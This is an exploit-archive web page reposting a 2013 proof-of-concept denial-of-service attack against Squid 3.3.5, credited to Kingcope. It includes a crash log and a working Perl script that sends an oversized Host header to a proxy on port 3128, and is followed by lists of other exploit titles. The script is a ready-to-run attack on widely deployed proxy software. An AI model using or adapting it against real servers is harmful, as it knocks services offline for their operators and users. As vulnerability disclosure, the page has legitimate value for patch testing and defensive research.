首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Squid-3.3.5 DoS PoC
来源:isowarez.isowarez.isowarez () googlemail com 作者:Kingcope 发布时间:2013-07-16  
#Squid Crash PoC
#Copyright (C) Kingcope 2013
#tested against squid-3.3.5
#this seems to be the patch for the vulnerability:
#http://www.squid-cache.org/Versions/v3/3.3/squid-3.3.8.patch
#The squid-cache service will respawn, looks like a kind of assert exception:
#2013/07/15 20:48:36 kid1| Closing HTTP port 0.0.0.0:3128
#2013/07/15 20:48:36 kid1| storeDirWriteCleanLogs: Starting...
#2013/07/15 20:48:36 kid1|   Finished.  Wrote 0 entries.
#2013/07/15 20:48:36 kid1|   Took 0.00 seconds (  0.00 entries/sec).
#FATAL: Bungled (null) line 9: snmp_access deny all
#Squid Cache (Version 3.2.11): Terminated abnormally.
#CPU Usage: 0.020 seconds = 0.012 user + 0.008 sys
#Maximum Resident Size: 33312 KB
#Page faults with physical i/o: 0
#Memory usage for squid via mallinfo():
#        total space in arena:    4100 KB
#        Ordinary blocks:         4046 KB      7 blks
#        Small blocks:               0 KB      0 blks
#        Holding blocks:           564 KB      2 blks
#        Free Small blocks:          0 KB
#        Free Ordinary blocks:      53 KB
#        Total in use:            4610 KB 112%
#        Total free:                53 KB 1%
#2013/07/15 20:48:39 kid1| Starting Squid Cache version 3.2.11 for
i686-pc-linux-gnu...
#2013/07/15 20:48:39 kid1| Process ID 2990

use IO::Socket;

my $sock = IO::Socket::INET->new(PeerAddr => '192.168.27.146',
                              PeerPort => '3128',
                              Proto    => 'tcp');
$a = "yc" x 2000;
print $sock "HEAD http://yahoo.com/ HTTP/1.1\r\nHost: yahoo.com:$a\r\n\r\n";
while(<$sock>) {
print;
}


 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·MediaCoder 0.8.23.5530 SEH Buf
·rpcbind (CALLIT Procedure) UDP
·MediaCoder .M3U Buffer Overflo
·Light Audio Mixer Version 1.0.
·Microsoft Windows Authenticate
·Kate's Video Toolkit Version 7
·Corel PDF Fusion Stack Buffer
·Eglibc PTR MANGLE Bug
·Tri-PLC Nano-10 r81 - Denial o
·BlazeDVD Pro player 6.1 - Stac
·Ultra Mini HTTPD 1.21 - Stack
·Microsoft Office PowerPoint 20
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved